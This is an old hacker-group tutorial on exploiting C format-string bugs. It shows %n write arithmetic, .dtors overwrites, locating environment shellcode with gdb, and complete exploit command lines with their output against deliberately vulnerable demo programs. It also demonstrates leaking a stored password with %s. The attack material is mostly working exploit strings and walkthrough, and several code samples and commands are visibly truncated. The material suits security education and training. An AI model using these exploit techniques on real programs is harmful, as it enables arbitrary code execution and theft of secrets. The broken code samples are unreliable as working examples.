Format String Technique

Written by : NOP Ninjas


Required: Helpful but Optional :


This document is not a definitive guide to exploiting format strings. Other useful information will come from experimenting. I hope this paper will explain how things are done in a somewhat easy to understand manner. I have tried to demonstrate as much as possible through examples (wherever possible).


First format strings in c should be examined. There are only a few format characters from the entire that are relevant to this discussion. Any search engine should yield a more thorough list of websites with further information.

  %x  - Print the hex value of the argument.
  %s  - The char string at the address passed to it.
  %d  - For our purposes this will just print strings of data for
        incrementing bytes. Should not be used, can create unwanted
  %u  - For our purposes this will just print strings of data for
        incrementing bytes. This is unsigned as compared to %d
        which is signed. This will drop any negative values that 
        could possibly add a - into the output.
  %n  - Write the number of bytes previously written to the address  

Functions that use formatting are vulnerable when the programmer does not properly format the data before passing it.

  incorrect: printf(string);
    correct: printf("%s", string);

This simple mistake could lead to a big security risk. All of the printf family of functions have this type of problem: (printf, fprintf, sprintf, snprintf, vsprintf, vsnprintf, etc). There are also other functions which may use formats (like syslog).

More formatting

Since there are not any arguments given by the programmer, it will take the first argument off the stack. With the "$" format modifier any of the passed arguments can be referenced. For example:

  printf("%2$x %1$x\n", 0x1, 0x2);

would output:

  "2 1"

Stack offsets

It is assumed that the reader has some knowledge of how the stack works but it is not required. The most important thing that must be learned is the layout of where input data lies in relation to the current stack position. The crude diagram shows the layout as so:

 Bottom                                         Top 
 [ user stack ][ command line args ][ environment ]

As noted, this is a crude diagram to illustrate the general layout. The current position will be somewhere in the user stack. It is possible to pop arguments off the stack to be displayed in hex with %x. With multiple %x formats it is possible to reach the top of the stack.

Using the "$" modifier any argument can be directly accessed by its stack offset. Instead of a long strings of %x's there could be one "%95$x". Being able to access user input via stack offsets it crucial to the exploitation of format strings.

%n madness

The %n format is used to write the amount of bytes already written into the specified (int) argument. When there is no argument given, it writes to the next argument on the stack. %n can be formatted with the "$" modifier to select any argument offset. %hn does the same thing but with the type (short). Here is an example of how it can be used:

  int main(int argc, char *argv[]) {
    int num;

    printf("%s%n\n", argv[1], &num);
    printf("Bytes written: %p\n", num);
  sloth@sin:~/source/nopninjas$ ./test 1234567890
  Bytes written: 

Notice that 0xa = 10. To write 0xbfff, write 49151 characters into argv[1]. To test this out:

  sloth@sin$ ./test `perl -e 'print "A"x49151'`
  ... lots of A's ...
  Bytes written: 0xbfff

This method can be abused and given an arbitrary address. This is what makes format strings lethal.

Exploiting basic format strings

It is not always simple to place the input data somewhere on the stack where it is easily reached. The following is a very simple demonstration:

fmt1.c ----------------------------------------------------

int main(int argc, char *argv[]) {
  char buf[1024];

  strncpy(buf, argv[1], sizeof(buf));

sloth@sin$ ./fmt 'AAAA %x'
AAAA 41414141

Finding the input arguments / Generating the debugging string

The input is the next argument on the stack. Next expand the string into a more realistic form so that that the offsets on the stack will match up after changing the command line arguments. Use easyflow during the testing phase of writing format string exploits. Either the UNIX printf command in the shell or Perl will suffice. Keep in mind the little endian byte ordering of the addresses. easyfl: \l01020304 is the same as printf/perl: \x04\x03\x02\x01.

sloth@sin$ ./fmt `easyfl '\l41414141\l42424242   \
AAAABBBBCCCCDDDD109479558541414141111163859442424242  \

Here is the output with the values bracketed:

AAAABBBBCCCCDDDD1094795585(41414141)1111638594(42424242)  \

Each of the 4 byte address strings will eventually point to locations in memory where writing is needed. Any 4 byte strings that are easily recognizable in a mess of data will do. If the %x offsets are correct, each of the address strings should be printed as hex in the order given. It is possible to put the brackets around the %x to make the output easier to read. In more complicated examples it may lead to changing the stack, throwing off the stack argument offset values.

The %.010u will print out 10 bytes of data. Later these will be modified to change the values that %n will write. Those 10 bytes will be written as 0x0a into memory given that these are the first bytes written. Each following write will be an accumulation of bytes already written. For now, They are there to keep the string as static in length as possible during testing to reduce the chances of the offsets shifting.

Since the first address is at the first argument offset on the stack we could just use %x. To conform with the rest of the string we can convert it to: %1$x. Each following address is selected by increasing the offset: %1$x %2$x %3$x %4$x.

Placing the shellcode / What to overwrite ?

For simplicity put the executable code into our environment:

sloth@sin$ EXECSHELL=`easyfl '[200,\x90] \
sloth@sin$ export EXECSHELL

Also for simplicity, overwrite .dtors. Further information on overwriting .dtors can be found at:

To find the beginning of the .dtors section use "nm <execname>" or some other similar utility to view the symbols table. In gdb the .dtors address can be obtained with "maintenance info sections".

sloth@sin$ nm fmt
... skipping ...
080494a8 ? __DTOR_END__
080494a4 ? __DTOR_LIST__
... skipping

Here is the stripped output from nm. The address that needs to be written is 4 bytes past the start of the .dtors section: 0x080494a4 + 4 = 0x080494a8.

Creating/Debugging the writing format string

Now that there is an address to write to, it will need to be put into the format string. Each of following addresses will need to be incremented by 1 to point to the next location in memory to write to. 0x080494a8 0x080494a9 0x080494aa 0x080494ab

sloth@sin$ ./fmt `easyfl '\l080494a8  \
\l080494a9\l080494aa\l080494ab%.010u%1$n%.010u%2$n%.010u%3$n  \
... output not useful ...
Segmentation fault (core dumped)

sloth@sin$ gdb fmt core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
... skipping ...
(gdb) bt
#0  0x382e241a in ?? ()
#1  0x8048479 in _fini ()
#2  0x4003d80d in exit () from /lib/
#3  0x4003557d in __libc_start_main () from /lib/

This shows that it crashed during the destructor phase (_fini). The current EIP seems quite random at the moment because each byte has not been adjusted yet.

Finding the shellcode

The address to the executable code in this environment will need to be found. gdb is the way to go. This topic is covered in the suggested reading material.

sloth@sin$ gdb fmt core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
... blah blah ...
#0  0x382e241a in ?? ()
(gdb) x/2000x $ebp
0xbffff854: 0xbffff860      0x08048479      0x401019b4      0xbffff874
0xbffff864: 0x4003d80d      0x401019b4      0x4000aa70      0xbffff8c4
0xbffff874: 0xbffff898      0x4003557d      0x00000001      0x00000002
... pages of data in hex ...
0xbffffec4: 0x2f65646b      0x3a6e6962      0x7273752f      0x6168732f
0xbffffed4: 0x742f6572      0x666d7865      0x6e69622f      0x45584500
0xbffffee4: 0x45485343      0x903d4c4c      0x90909090      0x90909090
0xbffffef4: 0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff04: 0x90909090      0x90909090      0x90909090      0x90909090
... BINGO! ...

Starting from the EBP ($ebp in gdb) search for the hex representation of the NOP's in the shellcode with "x/x". Above, 0x90909090 is at 0xbfffff04.

Creating the final string / Calculation

Always remember to write in order of least significant bit to most significant. In this case the %u before the first %n will be the one to increment. There are 2 ways to do this -- calculate how many more bytes are needed or guess and adjust as needed. In small examples like this one, the guess and check method will work; however, sometimes due to the lack of output it may be necessary to calculate it exactly.

0x382e241a can be broken down into each byte as it would be written. First, 0x1a (26 in decimal) shows that 26 bytes have been written before the %n. 16 bytes are the addresses 0x080494a8 0x080494a9 0x080494aa 0x080494ab plus 10 more from "%.010u". The next byte 0x24 (36 in decimal) is a combination of the 26 previous bytes already written and another 10 from the second "%.010u". 0x2e (46 in decimal) is another 10 bytes more than the last. The same is with 0x38.

It probably is not necessary to have to modify the least significant bit if the shellcode is longer than 256 bytes. Our new goal address to write is 0xbfffff1a.

  0xbfffff1a = [191][255][255][ 26]
  255 - 26(4*4+10 bytes for argument addresses + %.010u) = 229
  255 - 255 = 0    <-- This means nothing has to be written for the 3rd

  (amount needed) - (already written) = (amount left to write)

Subtract the amount of bytes already written from the amount of bytes needed. This will be the amount to put into the value for %u. Also, to jump ahead slightly, the next number is 255. This means that the same value can be reused in more accurate terms. Since it will have already written 255 bytes, the third %u can be removed. Here is the current string so far:

  sloth@sin$ ./fmt `easyfl'\l080494a8\l080494a\l080494aa  \

                                         Coming Soon.
  Summary: [%.010u %1$n %.229u %2$n %3$n][%.010u %4$n]

If it is not possible to subtract bytes written without a negative answer, the last write will have to roll over into the next significant byte.

        255 = 0xff
  255 + 256 = 0x1ff   <-- roll over

        191 = 0xbf
  191 + 256 = 0x1bf(447)
  447 - 255 = 192

192 bytes will have to be written with %u to get the last value in place. The final string should look like:

  sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa  \

  Summary: [%.010u %1$n %.229u %2$n %3$n %.192u %4$n]

Executing the string

It's time to execute it and check the results. In the example the "hello world" shellcode was used. It will just print the string and exit. An extra "; echo" at the end will add a new line after the "hello world" because the default shellcode in easyfl does not contain a "\n".

sloth@sin$ ./fmt `easyfl '\l080494a8\l080494a9\l080494aa \
\l080494ab%.010u%1$n%.229u%2$n%3$n%.192u%4$n'`; echo
013451792800000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000001345179290000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
000000000000000000000000000000000000000000000000000000000000000000  \
hello world 

The odd numbers inside the string of 0's are the arguments popped from the stack by %u. If the "$" modifier is not used with %x or %n it would require having buffer arguments to pass to %u.

  [%u arg][%n arg][%u arg][%n arg][%u arg][%n arg][%u arg][%n arg]
  real: [AAAA][\l080494a8][AAAA][\l080494a9] etc...

Shortening the format string

It is not necessary to use 4 write statements. It is possible to only use 2 writes, each of 2 bytes to write the data. This way other data is not accidently overwritten if it is necessary to roll a value into the next significant byte. It is also used to make the string even smaller. For safety %hn is employed here even though just %n could be used. Using the last example we can build our sample string.

  The 2 locations that need to be written to (.dtors)
  0x080494a8 0x080494a8+2  <-- The second argument address is 
                               incremented by 2.

  0xbfffff1a is still our shellcode address. We can break this up:

  0xbfff = 49151
  0xff1a = 65306

  65306 - 8(bytes for addresses) = 65298(bytes left for %u to write)
  49151 + 65536 = 0x1bfff
  0x1bfff(total) - 0xff1a(already written) = 49381(needed)

No more goofing around. Lets test it out:

  sloth@sin$ ./fmt `easyfl '\l080494a8\l080494aa%.65298u%1$hn  \
%.49381u%2$hn'`; echo
  hello world

Yet another format string is broken.

Format strings on the heap

For the next example the format string will be placed on the heap. Because this is a local hole, exploiting it should be fairly trivial.

fmt2.c ----------------------------------------------------------

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
  char *blah=malloc(1024);

  fgets(blah, 1023, stdin);

Placing the addresses on the stack

Sometimes the input buffer to the format string is not on the stack. On a local system this is a simple task. The addresses can be placed as an argument string to the program or can be placed in the environment. Be careful for special characters that may not be passed such as \x00 on the command line.

  sloth@sin$ export ADDYS="AAAAAAAA"
  sloth@sin$ ./fmt2 'AAAAAAAA'  (must be done with each execution)

Finding hard to reach data

To find the general offset a simple bash loop can be used:

  sloth@sin$ for (( I=1; I<500; I=`expr $I + 1` )); do      \
( echo "$I %$I\$x" ) | ./fmt2 |grep 4141; done
  364 4141413d
  365 41414141

Aligning the data

As you can see, the alignment is off because of the the rest of the data in the environment.

  sloth@sin$ export ADDYS="AAAABBBB"
  sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2 
  Bracketed: 0134518248(4141413d)1073743880(42424241)

Adding an alignment character to the string will fix the leaking characters.

  sloth@sin$ export ADDYS="AAAABBBBX"
  sloth@sin$ (echo '%.00010u%364$x%.00010u%365$x') | ./fmt2
  Bracketed: 0134518248(41414141)1073743880(42424242)

Everything is aligned now. It is time to put the addresses for .dtors into the environment.

Finishing touches

  sloth@sin$ export ADDYS=`easyfl '\l080494f4\l080494f6X'`

This format string does not have any addresses or data printed before it. %u will have to write the exact amount for the first write.

           0xff1a = 65306
 0x1bfff - 0xff1a = 49381

  sloth@sin$ (echo '%.65306u%364$hn%.49381u%365$hn') | ./fmt2; echo
  hello world

Again the hello world shellcode is executed.

Misc Stuff

About blind and remote(non-stock binary) attacks

When it comes down to blind or remote format strings it is necessary to be very precise. Exact calculations as well as stack dumps with %x can be very helpful. .dtors is really only useful when there is access to the binary. This is all stuff that should be learned through experimentation.

Types of real world format strings

fprintf, printf, sprintf, snprintf, vfprintf, vprintf, vsprintf, vsnprintf, setproctitle, syslog, and more. These are all commonly missused in the real world. Here is an example of a misused vsnprintf (a personal favorite).

fmt4.c ------------------------------------------------

#include <stdio.h>
#include <stdarg.h>

void printing(char *fmt, ...) {
  va_list ap;
  char output[1024];

  va_start(ap, fmt);
  vsnprintf(output, sizeof(output), fmt, ap);
  printf("ARG: %s\n", output);

int main(int argc, char *argv[]) {
  if(argc>1) printing(argv[1]); <-- printing() must be formatted

/* correct usage */
/* if(argc>1) printing("%s", argv[1]); */

How to abuse %s

With %s, any string in valid memory can be output. It could be a password, user data, environment variables, or anything else that could be useful. Here is a sample of how to abuse %s:

password.c -----------------------------------------------

  static char password[] = "hax0r";

  int main(int argc, char *argv[]) {
    char buf[256];

    strncpy(buf, argv[1], sizeof(buf));

With the output of nm the address of password can be found.

  sloth@sin$ nm test
  ... skipping ...
  08049484 d password
  ... skipping ...

  0x08049484 is the address of password.

  sloth@sin$ ./test `easyfl '\l08049484%s'`; echo

This is just a very basic example. Using %x to dump data off the heap, it could be possible to use that data with %s to find out more information about what exactly is happening.

Information      - My stupid site. Links to resources, news, 
                           and wargames.    - Wargames collection (
                           vuln dev). Thanks to dies and all the 
                           maintainers of the various servers. Also all 
                           those who help others.
                       - More wargames - good stuff   - Cool people [RsN] 
                           Also runs

12/09/01 - -